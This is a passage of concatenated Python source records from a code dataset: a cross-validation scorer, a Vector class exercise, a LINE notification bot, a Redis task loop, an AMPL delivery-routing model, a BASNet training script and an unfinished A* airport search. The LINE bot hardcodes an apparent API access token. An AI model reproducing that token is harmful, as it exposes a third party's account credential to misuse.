kf.split(data)]\n    score = [accuracy(labels[result[1]], result[0]) for result in result_set]\n    total_score = 0.\n    for i in range(3):  # average the accuracy of the first 3 folds only\n        total_score += score[i]\n    res_score = total_score / 3\n    return res_score\n","sub_path":"Algorithm/FSFOA/classify_model.py","file_name":"classify_model.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
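# cal_fitvalue() above fits and scores the chosen model on 10 shuffled folds
# but averages only the first three accuracies. A sketch of the same
# fit/predict/score loop that averages every fold, which is the more common
# cross-validation estimate (iris is used just to make it runnable):
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import KFold
from sklearn.neighbors import KNeighborsClassifier

data, labels = load_iris(return_X_y=True)
model = KNeighborsClassifier(n_neighbors=3)
kf = KFold(n_splits=10, shuffle=True, random_state=0)
scores = []
for train, test in kf.split(data):
    pred = model.fit(data[train], labels[train]).predict(data[test])
    scores.append(np.mean(pred == labels[test]))
print(np.mean(scores))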
integers\".format(cls=cls))\n\n def __iter__(self):\n return iter(self.__components)\n\n def __repr__(self):\n component_str = reprlib.repr(self.__components)\n component_str = component_str[component_str.find('['):-1] # 也可使用list转换,但代价太大\n return \"Vector({})\".format(component_str)\n\n def __str__(self):\n return str(tuple(self))\n\n def __bytes__(self):\n return bytes([ord(self.typecode)]) + bytes(self.__components)\n\n def __eq__(self, other): # 比较方案改进,适用于超长的数组\n # return tuple(self) == tuple(other)\n return len(self) == len(other) and all(\n a == b for a, b in zip(self, other)) # zip返回两个迭代, all返回只有所有比较都为True,才返回True\n\n def __hash__(self):\n hashes = (hash(x) for x in self) # 使用了生成器,内部有yield产生参数\n return functools.reduce(operator.xor, hashes, 0)\n\n def __abs__(self):\n return math.sqrt(sum(x * x for x in self))\n\n def __bool__(self):\n return bool(abs(self))\n\n @classmethod\n def frombytes(cls, octets):\n typecode = chr(octets[0])\n memv = memoryview(octets[1:]).cast(typecode)\n return cls(memv)\n\n shortcut_names = \"xyzt\"\n\n def __getattr__(self, name): # vector 类能够使用 vector.x vector.y 来获取对应位置的值\n cls = type(self) # type 返回类中的参数\n if len(name) == 1:\n pos = cls.shortcut_names.find(name)\n if 0 <= pos < len(self.__components):\n return self.__components[pos]\n raise AttributeError(\"{.__name__} object has no attribute {}\".format(cls, name))\n\n def __setattr__(self, name, value): # 设置 vector 为只读属性\n cls = type(self)\n if len(name) == 1:\n if name in cls.shortcut_names:\n error = \"readonly attribute {attr_name!r}\"\n elif name.islower():\n error = \"can't set 'a' to 'z' in {cls_name!r}\"\n else:\n error = \"\"\n\n if error:\n raise AttributeError(error.format(attr_name=name, cls_name=cls.__name__))\n super().__setattr__(name, value)\n\n def angle(self, n):\n r = math.sqrt(sum(x * x for x in self[n:]))\n a = math.atan2(r, self[n - 1])\n if (n == len(self) - 1) and (self[-1] < 0):\n return math.pi * 2 - a\n else:\n return a\n\n def angles(self):\n return (self.angle(n) for n in range(1, len(self)))\n\n def __format__(self, format_spec=\"\"):\n if format_spec.endswith('h'):\n format_spec = format_spec[:-1]\n coords = itertools.chain([abs(self)], self.angles())\n outfm = \"<{}>\"\n else:\n coords = self\n outfm = \"({})\"\n components = (format(f, format_spec) for f in coords)\n return outfm.format(\",\".join(components))\n\n\nvector_a = Vector([3.0, 4.0])\nprint(\"vector_a:\", vector_a)\n\nvector_b = Vector([8, 9, 10])\nprint(\"vector_b:\", vector_b)\n\nprint(\"\\n重载+运算符前:\")\n\ntry:\n vector_c = vector_a + vector_b\nexcept:\n traceback.print_exc()\n\nprint(\"\\n重载+运算符后:\")\n\n\ndef add(self, other):\n try:\n pairs = itertools.zip_longest(self, other, fillvalue=0.0)\n return Vector(a + b for a, b in pairs)\n except TypeError:\n return NotImplemented\n\n\ndef addr(self, other):\n return self + other\n\n\nVector.__add__ = add\nVector.__radd__ = addr\n\nprint(\"vector_a + vector_b = \", vector_a + vector_b)\nprint(\"vector_a + [1,2,3,4,5] = \", vector_a + [1, 2, 3, 4, 5])\nprint(\"[1,2,3,4,5] + vector_a = \", [1, 2, 3, 4, 5] + vector_a)\n# print(\"'ABC' + vector_a = \", 'ABC' + vector_a)\n\nprint(\"\\n重载*运算符后:\")\n\nimport numbers\n\n\ndef mul(self, scalar):\n if isinstance(scalar, numbers.Real):\n return Vector(a * scalar for a in self)\n else:\n return NotImplemented\n\n\ndef rmul(self, scalar):\n return self * scalar\n\n\nVector.__mul__ = mul\nVector.__rmul__ = rmul\n\nprint(\"vector_a * 7 = \", vector_a * 7)\nprint(\"7 * vector_a = \", 7 * vector_a)\n\nfrom fractions import 
\ni = Fraction(1, 3)\nj = 1/3\nprint(\"vector_a * i = \", vector_a * i)\nprint(\"vector_a * j = \", vector_a * j)\npass\n","sub_path":"13-Overload/13-01-Vector.py","file_name":"13-01-Vector.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"157094075","text":"#!/usr/bin/env python3\nfrom linenotipy import Line\nimport subprocess\nfrom subprocess import PIPE\n\n\nclass Bot(object):\n    def __init__(self):\n        self.line = Line(token=\"DVxKcN9dg0ecy9ETJtRpVHZr2Uouw1IyRDQtfxl3Ypk\")\n\n    def sender(self):\n        self.line.post(message=\"finish experiment\")\n        self.stopper()\n\n    def stopper(self):\n        command = \"sudo service cron start\"\n        proc = subprocess.Popen(\n            command, shell=True, stderr=PIPE, stdout=PIPE, text=True)\n        proc.communicate()[0]\n\n\ndef switch():\n    command = \"ps -aux | grep less | wc -l\"\n    proc = subprocess.Popen(\n        command, shell=True, stderr=PIPE, stdout=PIPE, text=True)\n    res = proc.communicate()\n    return res[0].strip()\n\n\ndef main():\n    sw = int(switch())\n    bot = Bot()\n    bot.sender() if sw == 2 else None\n\n\nmain()\n","sub_path":"command/line-sender.py","file_name":"line-sender.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"606641996","text":"# coding=utf-8\n# ------------------ add the project root paths to sys.path\nimport os\nimport sys\n\ncurrent_Path = os.path.abspath(os.path.dirname(__file__))\nroot_path = os.path.split(current_Path)[0]\n__root_path = root_path.split(sep=\"context\")[0]\n__root_path_1 = __root_path + \"context\" + os.sep\n__root_path_2 = __root_path + \"doc\" + os.sep\nprint(__root_path_1, \"========\", __root_path_2)\nsys.path.append(__root_path_1)\nsys.path.append(__root_path_2)\n# ------------------\nfrom lawcase.master import redis_case_lawyer_task_master\nimport logging\nimport time\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n                    datefmt='%a, %d %b %Y %H:%M:%S', filemode='a', )\nif __name__ == \"__main__\":\n    while True:\n        redis_case_lawyer_task_master(batch_num=10)\n        logging.info(\"=*= sleeping for 5 seconds =*=\")\n        time.sleep(5)\n","sub_path":"lawyer/case/context/lawcase/master/case_lawyer_master.py","file_name":"case_lawyer_master.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}{"seq_id":"478413058","text":"import sys\nimport tempfile\nimport numpy as np\nfrom copy import deepcopy\nfrom amplpy import AMPL\nfrom sweep.sweep import sweep\nfrom clarke_wright.clarke_wright import clarke_wright\nfrom collections import namedtuple\nfrom enum import Enum\n\nclass Model(object):\n\tResult = namedtuple(\"Result\", \"carId cargo sales road path income totalIncome capacityUsed\")\n\n\tclass AlgorithmType(Enum):\n\t\tSweep = 1\n\t\tClarkeWright = 2\n\n\tdef __init__(self, dataDirectory, verbose=False):\n\t\tself.data = self.load_data(dataDirectory)\n\t\tprint(\"Loaded data: {0}\".format(self.data))\n\t\tself.verbose = verbose\n\n\tdef run(self, algorithmType):\n\t\tif algorithmType is Model.AlgorithmType.Sweep:\n\t\t\tresult = self.run_sweep(self.data)\n\t\telif algorithmType is Model.AlgorithmType.ClarkeWright:\n\t\t\tresult = self.run_clarke_wright(self.data)\n\t\telse:\n\t\t\traise ValueError(\"algorithmType is invalid: {0}\".format(algorithmType))\n\n\t\t# Run AMPL model for each car separately\n\t\tresults = []\n\t\tfor (car_id, cities) in result:
\n\n\t\t\tif self.verbose:\n\t\t\t\tprint('\\nCAR {0}:'.format(car_id))\n\n\t\t\t# Get subset of the data and run AMPL model\n\t\t\tdata_subset = self.get_data_subset(self.data, car_id, cities)\n\t\t\tampl = self.run_ampl_model(data_subset)\n\n\t\t\tresult = self.collectResult(car_id, ampl, cities)\n\t\t\tresults.append(result)\n\n\t\t\tif self.verbose:\n\t\t\t\tprint(result)\n\n\t\tsimplified_demand = self.get_simplified_demand(self.data.demand, self.data.volumes)\n\t\tpoints = np.append(self.data.coordinates, simplified_demand, axis=1)\n\n\t\treturn results, points\n\n\tdef print_scalar_param(self, file, param, name):\n\t\tfile.write('param {0} := {1};'.format(name, param))\n\n\tdef print_1d_param(self, file, param, name):\n\n\t\t# Write header\n\t\tfile.write('param {0} :=\\n'.format(name))\n\n\t\t# Write data rows\n\t\tfor idx, elem in enumerate(param):\n\t\t\tif isinstance(elem, str):\n\t\t\t\tfile.write('{0} \"{1}\"'.format(idx + 1, elem))\n\t\t\telse:\n\t\t\t\tfile.write('{0} {1}'.format(idx + 1, elem))\n\t\t\tif idx == (param.shape[0] - 1):\n\t\t\t\tfile.write(';')\n\t\t\tfile.write('\\n')\n\n\tdef print_2d_param(self, file, param, name):\n\n\t\t# Write header\n\t\tfile.write('param {0} : '.format(name))\n\t\tfor i in range(0, param.shape[1]):\n\t\t\tfile.write('{0} '.format(i + 1))\n\t\tfile.write(':=\\n')\n\n\t\t# Write data rows\n\t\tfor idx, row in enumerate(param):\n\t\t\tfile.write('{0} '.format(idx + 1))\n\t\t\tfor elem in row:\n\t\t\t\tfile.write('{0} '.format(elem))\n\t\t\tif idx == (param.shape[0] - 1):\n\t\t\t\tfile.write(';')\n\t\t\tfile.write('\\n')\n\n\tdef write_data_to_temp_file(self, tmp_file, data):\n\t\tself.print_2d_param(tmp_file, data.demand, 'POPYT')\n\t\tself.print_2d_param(tmp_file, data.prices, 'CENA')\n\t\tself.print_2d_param(tmp_file, data.roads, 'DROGI')\n\t\tself.print_2d_param(tmp_file, data.shortage_coeff, 'WAGA_NIEZADOWOLENIA')\n\t\tself.print_1d_param(tmp_file, data.supply, 'PODAZ')\n\t\tself.print_1d_param(tmp_file, data.volumes, 'OBJETOSC')\n\t\tself.print_1d_param(tmp_file, data.cities, ': punkty: miasta')\n\t\tself.print_1d_param(tmp_file, data.breadTypes, ': pieczywa: typy')\n\t\tself.print_scalar_param(tmp_file, 1, 'KOSZT_KIEROWCY')\n\t\tself.print_scalar_param(tmp_file, data.capacity, 'POJEMNOSC')\n\n\tdef generate_temp_data_file(self, data):\n\t\t# Text mode ('w+') so the formatted strings above can be written under Python 3\n\t\ttmp_file = tempfile.NamedTemporaryFile('w+')\n\n\t\t# Fill with data\n\t\tself.write_data_to_temp_file(tmp_file, data)\n\t\tif self.verbose:\n\t\t\tprint('\\nDATA FILE:')\n\t\t\tself.write_data_to_temp_file(sys.stdout, data)\n\t\t\tprint('\\n')\n\n\t\t# Dirty hack\n\t\t# File will be already open while amplpy uses it, but we have to make sure\n\t\t# it is 'rewound'\n\t\ttmp_file.seek(0)\n\n\t\treturn tmp_file\n\n\tdef run_ampl_model(self, data):\n\t\t# Initialize AMPL, choose the solver and load the model\n\t\tampl = AMPL()\n\t\tampl.eval('option solver cplex;')\n\t\tampl.read('model/ampl/model.mod')\n\n\t\t# Generate and load temporary data file\n\t\tdata_file = self.generate_temp_data_file(data)\n\t\tampl.readData(data_file.name)\n\t\tdata_file.close()\n\n\t\tampl.solve()\n\t\treturn ampl\n\n\tdef findPathInRoad(self, cities, road):\n\t\tpath = []\n\t\tcurrent_city = 0\n\t\twhile True:\n\t\t\tif current_city == 0 and len(path) > 0:\n\t\t\t\tbreak\n\t\t\tpath.append(current_city)\n\t\t\trow = road[current_city, :]\n\t\t\tfor idx, elem in enumerate(row):\n\t\t\t\tif elem > 0:\n\t\t\t\t\tcurrent_city = idx\n\t\t\t\t\tbreak\n\n\t\treturn cities[path]\n\n\tdef 
calculateIncome(self, ampl):\n\t\tsold = np.array(ampl.getVariable('SPRZEDAZ').getValues().toPandas().as_matrix())\n\t\tprice = np.array(ampl.getParameter('CENA').getValues().toPandas().as_matrix())\n\t\tincome_per_city = np.multiply(sold, price)\n\n\t\treturn np.transpose(income_per_city)\n\n\tdef calculateTotalIncome(self, income):\n\t\ttotalIncome = np.sum(income)\n\t\treturn totalIncome\n\n\tdef calculateCapacityUsed(self, capacity, sales):\n\t\tsalesTotal = 0\n\t\tfor inCitySales in sales:\n\t\t\tsalesTotal += np.sum(inCitySales)\n\t\tcapacityUsed = (salesTotal / capacity) * 100\n\t\treturn capacityUsed\n\n\tdef collectResult(self, id, ampl, cities):\n\t\tnum_of_cities = len(cities)\n\n\t\tcargo = self.get_np_array_from_variable(ampl, 'ZABRANE')\n\t\tsales = self.get_np_array_from_variable(ampl, 'SPRZEDAZ', \n\t\t\tTrue, (num_of_cities, -1))\n\t\troad = self.get_np_array_from_variable(ampl, 'UZYCIE_DROGI', \n\t\t\tTrue, (num_of_cities, num_of_cities))\n\t\tpath = self.findPathInRoad(cities, road)\n\t\tincome = self.calculateIncome(ampl).reshape(num_of_cities, -1)\n\t\ttotalIncome = self.calculateTotalIncome(income)\n\t\tcapacityUsed = self.calculateCapacityUsed(self.data.capacity[id], sales)\n\t\tresult = Model.Result(id, cargo, sales, road, path, income, totalIncome, capacityUsed);\n\t\treturn result\n\n\tdef get_np_array_from_variable(self, ampl, name, two_dim=False, shape=(-1, 1)):\n\t\ttmp = np.transpose(ampl.getVariable(name).getValues().toPandas().as_matrix())\n\t\tif two_dim:\n\t\t\ttmp = np.reshape(tmp, shape)\n\t\treturn tmp\n\n\tclass Struct(object): pass\n\n\tdef load_data(self, data_dir):\n\n\t\t# Load numerical data\n\t\tdata = Model.Struct()\n\t\tdata.demand = np.genfromtxt('{0}/demand'.format(data_dir), delimiter=\",\")\n\t\tdata.supply = np.genfromtxt('{0}/supply'.format(data_dir), delimiter=\",\")\n\t\tdata.prices = np.genfromtxt('{0}/prices'.format(data_dir), delimiter=\",\")\n\t\tdata.roads = np.genfromtxt('{0}/roads'.format(data_dir), delimiter=\",\")\n\t\tdata.shortage_coeff = np.genfromtxt('{0}/shortage_coeff'.format(data_dir), delimiter=\",\")\n\t\tdata.capacity = np.genfromtxt('{0}/capacity'.format(data_dir), delimiter=\",\")\n\t\tdata.volumes = np.genfromtxt('{0}/volumes'.format(data_dir), delimiter=\",\")\n\t\tdata.coordinates = np.genfromtxt('{0}/coordinates'.format(data_dir), delimiter=\",\")\n\t\t# Load textual data\n\t\tdata.cities = np.array([line.rstrip('\\n') for line in open('{0}/cities'.format(data_dir))])\n\t\tdata.breadTypes = np.array([line.rstrip('\\n') for line in open('{0}/types'.format(data_dir))])\n\t\tdata.citiesTotal = len(data.cities)\n\t\tdata.carsTotal = len(data.capacity)\n\t\treturn data\n\n\t# Calculates simplified demand as total volume of products needed to fulfill\n\t# the demand\n\tdef get_simplified_demand(self, demand, volumes):\n\n\t\tsimplified_demand = np.zeros((demand.shape[0], 1))\n\n\t\tfor idx0, row in enumerate(demand):\n\t\t\toverall_volume = 0\n\t\t\tfor idx1, elem in enumerate(row):\n\t\t\t\toverall_volume += elem * volumes[idx1]\n\t\t\tsimplified_demand[idx0] = overall_volume\n\n\t\treturn simplified_demand\n\n\tdef run_sweep(self, data):\n\n\t # Calculate simplified demand\n\t simplified_demand = self.get_simplified_demand(data.demand, data.volumes)\n\n\t # Get bakery coefficients\n\t depot_coordinates = (data.coordinates[0,0], data.coordinates[0,1])\n\n\t points = np.append(data.coordinates[1:, :], simplified_demand[1:], axis=1)\n\t (points, order, cars_used) = sweep(points, data.capacity, depot_coordinates)\n\n\t 
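# calculateIncome() above multiplies the units-sold matrix (SPRZEDAZ) by the
# price matrix (CENA) element-wise, so each entry is the revenue for one
# (city, bread type) pair; calculateTotalIncome() then sums it all. The same
# computation on toy numbers:
import numpy as np

sold = np.array([[10, 5],      # city 0: units of bread types 0 and 1
                 [4, 8]])      # city 1
price = np.array([[2.0, 3.0],
                  [2.5, 3.0]])
income_per_city = np.multiply(sold, price)
print(np.transpose(income_per_city))
print(np.sum(income_per_city))  # total income across cities and types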
result = []\n\t for car_id in range(0, cars_used):\n\n\t # Generate list od cities/points belonging to this cluster\n\t cities = []\n\t for index, (_,_,_,_,id) in enumerate(points):\n\t if car_id == id:\n\t cities.append(index)\n\n\t # Get original IDs (before sorting)\n\t cities = order[cities]\n\n\t # Increase IDs by one and add bakery (it was removed earlier before\n\t #running SWEEP). Then sort indices\n\t cities = np.sort(np.append(0, np.add(cities, 1)))\n\n\t result.append((car_id, cities))\n\n\t return result\n\n\tdef run_clarke_wright(self, data):\n\n\t # Calculate simplified demand\n\t simplified_demand = self.get_simplified_demand(data.demand, data.volumes)\n\n\t capacity = data.capacity\n\t #if len(data.capacity) != 1:\n\t # print(\"Warning: Clarke Wright algorithm assumes equal capacities of all cars\")\n\t # capacity = data.capacity[0]\n\n\t result = clarke_wright(data.roads, simplified_demand, capacity)\n\n\t print('Result:\\n')\n\t print(result)\n\n\t return result\n\n\tdef get_data_subset(self, data, car_id, city_ids):\n\n\t\tdata_subset = deepcopy(data)\n\n\t\ttmp = data_subset.roads[city_ids,:]\n\t\tdata_subset.roads = tmp[:,city_ids]\n\n\t\tdata_subset.cities = data_subset.cities[city_ids]\n\t\tdata_subset.demand = data_subset.demand[city_ids]\n\t\tdata_subset.prices = data_subset.prices[city_ids]\n\t\tdata_subset.shortage_coeff = data_subset.shortage_coeff[city_ids]\n\t\tdata_subset.capacity = data_subset.capacity[car_id]\n\t\tdata_subset.coordinates = data_subset.coordinates[city_ids]\n\n\t\treturn data_subset","sub_path":"app/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"383248451","text":"import torch\nimport torchvision\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport torch.optim as optim\nimport torchvision.transforms as standard_transforms\n\nimport numpy as np\nimport glob\n\nfrom data_loader import Rescale\nfrom data_loader import RescaleT\nfrom data_loader import RandomCrop\nfrom data_loader import CenterCrop\nfrom data_loader import ToTensor\nfrom data_loader import ToTensorLab\nfrom data_loader import SalObjDataset\n\nfrom model import BASNet\n\nimport pytorch_ssim\nimport pytorch_iou\n\n# ------- 1. 
define loss function --------\n\nbce_loss = nn.BCELoss(reduction='mean')  # size_average is deprecated in current PyTorch\nssim_loss = pytorch_ssim.SSIM(window_size=11,size_average=True)\niou_loss = pytorch_iou.IOU(size_average=True)\n\ndef bce_ssim_loss(pred,target):\n\n\tbce_out = bce_loss(pred,target)\n\tssim_out = 1 - ssim_loss(pred,target)\n\tiou_out = iou_loss(pred,target)\n\n\tloss = bce_out + ssim_out + iou_out\n\n\treturn loss\n\ndef muti_bce_loss_fusion(d0, d1, d2, d3, d4, d5, d6, d7, labels_v):\n\n\tloss0 = bce_ssim_loss(d0,labels_v)\n\tloss1 = bce_ssim_loss(d1,labels_v)\n\tloss2 = bce_ssim_loss(d2,labels_v)\n\tloss3 = bce_ssim_loss(d3,labels_v)\n\tloss4 = bce_ssim_loss(d4,labels_v)\n\tloss5 = bce_ssim_loss(d5,labels_v)\n\tloss6 = bce_ssim_loss(d6,labels_v)\n\tloss7 = bce_ssim_loss(d7,labels_v)\n\t#ssim0 = 1 - ssim_loss(d0,labels_v)\n\n\t# iou0 = iou_loss(d0,labels_v)\n\t#loss = torch.pow(torch.mean(torch.abs(labels_v-d0)),2)*(5.0*loss0 + loss1 + loss2 + loss3 + loss4 + loss5) #+ 5.0*lossa\n\tloss = loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6 + loss7 #+ 5.0*lossa\n\tprint(\"l0: %3f, l1: %3f, l2: %3f, l3: %3f, l4: %3f, l5: %3f, l6: %3f, l7: %3f\\n\"%(\n        loss0.item(),\n        loss1.item(),\n        loss2.item(),\n        loss3.item(),\n        loss4.item(),\n        loss5.item(),\n        loss6.item(),\n        loss7.item()\n        ))\n\t# print(\"BCE: l1:%3f, l2:%3f, l3:%3f, l4:%3f, l5:%3f, la:%3f, all:%3f\\n\"%(loss1.data[0],loss2.data[0],loss3.data[0],loss4.data[0],loss5.data[0],lossa.data[0],loss.data[0]))\n\n\treturn loss0, loss\n\n\n# ------- 2. set the directory of training dataset --------\n\ndata_dir = '/data/fangcheng.ji/datasets/human_segmentation'\ntra_image_dir = '/images/'\ntra_label_dir = '/masks/'\n\nmodel_dir = \"./saved_models/basnet_bsi/\"\nload_model_name = \"basnet_bsi_itr_6000_train_4.073827_tar_0.397622.pth\"\n\nwriter = SummaryWriter('./log')\n\nepoch_num = 100000\nbatch_size_train = 14\nbatch_size_val = 1\ntrain_num = 0\nval_num = 0\n\ntra_img_name_list = glob.glob(data_dir + tra_image_dir + '*')\ntra_lbl_name_list = [x.replace(tra_image_dir, tra_label_dir).replace('.' + x.split('.')[-1], '.png') \\\n                     for x in tra_img_name_list]\n\nprint(\"---\")\nprint(\"train images: \", len(tra_img_name_list))\nprint(\"train labels: \", len(tra_lbl_name_list))\nprint(\"---\")\n\ntrain_num = len(tra_img_name_list)\n\nsalobj_dataset = SalObjDataset(\n    img_name_list=tra_img_name_list,\n    lbl_name_list=tra_lbl_name_list,\n    transform=transforms.Compose([\n        RescaleT(256),\n        RandomCrop(224),\n        ToTensorLab(flag=0)]))\n\nsalobj_dataloader = DataLoader(\n    salobj_dataset,\n    batch_size=batch_size_train,\n    shuffle=True,\n    num_workers=8,\n    pin_memory=True\n)\n\n# ------- 3. define model --------\n# define the net\nnet = BASNet(3, 1, device=\"cuda\")\nif load_model_name:\n    print(f\"loading weight from {load_model_name}\")\n    net.load_state_dict(torch.load(model_dir + load_model_name))\n\n# ------- 4. define optimizer --------\nprint(\"---define optimizer...\")\noptimizer = optim.Adam(net.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\n# ------- 5. 
training process --------\nprint(\"---start training...\")\nite_num = 6000\nite_num4val = 0\nrunning_loss = 0.0\nrunning_tar_loss = 0.0\n\nfor epoch in range(0, epoch_num):\n net.train()\n\n for i, data in enumerate(salobj_dataloader):\n ite_num = ite_num + 1\n ite_num4val = ite_num4val + 1\n\n inputs, labels = data['image'], data['label']\n\n inputs_v = inputs.to(net.device)\n labels_v = labels.to(net.device)\n\n # y zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n d0, d1, d2, d3, d4, d5, d6, d7 = net(inputs_v)\n loss2, loss = muti_bce_loss_fusion(d0, d1, d2, d3, d4, d5, d6, d7, labels_v)\n\n loss.backward()\n optimizer.step()\n\n # # print statistics\n running_loss += loss.item()\n running_tar_loss += loss2.item()\n\n # tensorboard writer\n writer.add_scalar(\"Loss/loss_d0\", loss2.item(), ite_num)\n writer.add_scalar(\"Loss/loss_total\", loss.item(), ite_num)\n\n writer.add_scalar(\"Loss/running_loss_mean\", running_loss / ite_num4val, ite_num)\n writer.add_scalar(\"Loss/tar_loss_mean\", running_tar_loss / ite_num4val, ite_num)\n\n # del temporary outputs and loss\n del d0, d1, d2, d3, d4, d5, d6, d7, loss2, loss\n\n print(\"[epoch: %3d/%3d, batch: %5d/%5d, ite: %d] train loss: %3f, tar: %3f \" % (\n epoch + 1,\n epoch_num,\n (i + 1) * batch_size_train,\n train_num,\n ite_num,\n running_loss / ite_num4val,\n running_tar_loss / ite_num4val\n ))\n\n if ite_num % 2000 == 0: # save model every 2000 iterations\n\n torch.save(net.state_dict(), model_dir + \"basnet_bsi_itr_%d_train_%3f_tar_%3f.pth\" % (ite_num, running_loss / ite_num4val, running_tar_loss / ite_num4val))\n running_loss = 0.0\n running_tar_loss = 0.0\n net.train() # resume train\n ite_num4val = 0\n\nprint('-------------Congratulations! Training Done!!!-------------')\n","sub_path":"basnet_train.py","file_name":"basnet_train.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"217297411","text":"# Uniform Cost Search\n\n\n# sample graph \n\n# graph = {\n\t\n# \t'A': [['B', 10], ['C', 50]],\n# \t'B': [['A', 10], ['C', 20]],\n# \t'C': [['A', 50], ['B', 20], ['D', 420]],\n# \t'D': [['C', 420], ['E', 125]],\n# \t'E': [['D', 125]]\n# }\n\ngraphWithDirect = {\n\t\n\t'JFK': [['SFO', 2566], ['LAX', 2458], ['MSP', 1009], ['ORD', 720], ['CLT', 545], \n\t['ATL', 762], ['DFW', 1380], ['SLC', 1970], ['PHX', 2139], ['DTW', 485], ['SEA', 2397]],\n\t'SFO': [['JFK', 2566], ['LAX', 339], ['MSP', 1586], ['ORD', 1847], ['PHX', 652], \n\t['ATL', 2135], ['DFW', 1468], ['SLC', 599], ['DTW', 2083], ['SEA', 679]],\n\t'LAX': [['JFK', 2458], ['SFO', 339]],\n\t'MSP': [['JFK', 1009], ['SFO', 1586]],\n\t'ORD': [['JFK', 720], ['SFO', 1847], ['PHX', 1440]],\n\t'CLT': [['JFK', 545], ['SFO', 2292]],\n\t'ATL': [['JFK', 762], ['SFO', 2135]],\n\t'DFW': [['JFK', 762], ['SFO', 1468]],\n\t'SLC': [['JFK', 1970], ['SFO', 599]],\n\t'PHX': [['JFK', 2139], ['SFO', 652], ['ORD', 1440]],\n\t'DTW': [['JFK', 485], ['SFO', 2083]], \n\t'SEA': [['JFK', 2397], ['SFO', 679]]\n\n\n\n}\n\ngraphWithoutDirect = {\n\t\n\t'JFK': [['LAX', 2458], ['MSP', 1009], ['ORD', 720], ['CLT', 545], \n\t['ATL', 762], ['DFW', 1380], ['SLC', 1970], ['PHX', 2139], ['DTW', 485], ['SEA', 2397]],\n\t'SFO': [['LAX', 339], ['MSP', 1586], ['ORD', 1847], ['PHX', 652], \n\t['ATL', 2135], ['DFW', 1468], ['SLC', 599], ['DTW', 2083], ['SEA', 679]],\n\t'LAX': [['JFK', 2458], ['SFO', 339]],\n\t'MSP': [['JFK', 1009], ['SFO', 1586]],\n\t'ORD': [['JFK', 720], ['SFO', 1847], ['PHX', 
1440]],\n\t'CLT': [['JFK', 545], ['SFO', 2292]],\n\t'ATL': [['JFK', 762], ['SFO', 2135]],\n\t'DFW': [['JFK', 762], ['SFO', 1468]],\n\t'SLC': [['JFK', 1970], ['SFO', 599]],\n\t'PHX': [['JFK', 2139], ['SFO', 652], ['ORD', 1440]],\n\t'DTW': [['JFK', 485], ['SFO', 2083]], \n\t'SEA': [['JFK', 2397], ['SFO', 679]]\n\n\n\n}\n\n\nstraight_line_distance_from_airport_to_SFO = {\n\t\n\t'JFK': 2581.21,\n\t'LAX': 337.9,\n\t'MSP': 1586.82,\n\t'ORD': 1843.15,\n\t'CLT': 2292.27,\n\t'ATL': 2134.8,\n\t'DFW': 1462.51,\n\t'SLC': 598.54,\n\t'PHX': 651.16,\n\t'DTW': 2075.12,\n\t'SEA': 679.36\n}\n\naverage_ticket_price_from_airport_to_SFO = {\n\t\n\t'JFK': 334,\n\t'LAX': 173,\n\t'MSP': 275,\n\t'ORD': 275,\n\t'CLT': 422,\n\t'ATL': 383,\n\t'DFW': 265,\n\t'SLC': 180,\n\t'PHX': 255,\n\t'DTW': 375,\n\t'SEA': 156\n}\n\n\n\ndef A_star_search(graph, start, goal):\n\tnode = start\n\n\t# initialize the cost\n\tcost = 0\n\n\tfrontier = []\n\n\t# create a list for all the frontier node\n\tfrontier_node_costs = []\n\n\tcount = 0\n\n\tstored_cost = 0\n\n\t# initialize a queue containing node only\n\tfrontier.append(node)\n\t#print(frontier)\n\t#print(len(frontier))\n\n\t# initialize a queeu containing the visited nodes\n\tvisited = []\n\n\t# keep track of the current_cost as the algorithm progresses\n\tcurrent_cost = 0\n\n\twhile True: \n\t\t\n\t\t# reset count\n\t\tcount = 0\n\t\t#print(len(frontier))\n\t\tif len(frontier) == 0:\n\t\t\tprint(\"Sorry, no path exists!\")\n\t\t\treturn \n\n\t\t# choose the lowest cost node from the frontier\n\t\tif len(frontier_node_costs) != 0:\n\n\t\t\tfirst_cost = frontier_node_costs[0] + straight_line_distance_from_airport_to_SFO[frontier[0]] \n\t\t\tprint(\"--- Stright Line Distance ---\")\n\t\t\tprint(straight_line_distance_from_airport_to_SFO[frontier[0]])\n\t\t\tprint(\"--- ---\")\n\t\t\tprint(\"--- First cost ---\")\n\t\t\tprint(first_cost)\n\t\t\tprint(\"--- ---\")\n\t\t\tindex = 1\n\t\t\tlowest_index = 0\n\t\t\tlowest_cost = first_cost\n\n\n\n\t\t\theuristic_cost = 0\n\n\t\t\t# need to calculate f(n) from cost and estimated cost to goal\n\t\t\tfor cost in frontier_node_costs[1:len(frontier_node_costs)]:\n\t\t\t\theuristic_cost = current_cost + cost + straight_line_distance_from_airport_to_SFO[frontier[index]] \n\t\t\t\t#print(straight_line_distance_from_A_to_D[frontier[index]])\n\t\t\t\tprint(\"--- Cost ---\")\n\t\t\t\tprint(cost)\n\t\t\t\tprint(\"--- ---\")\n\t\t\t\tprint(\"--- Straight Line Distance + Avg. 
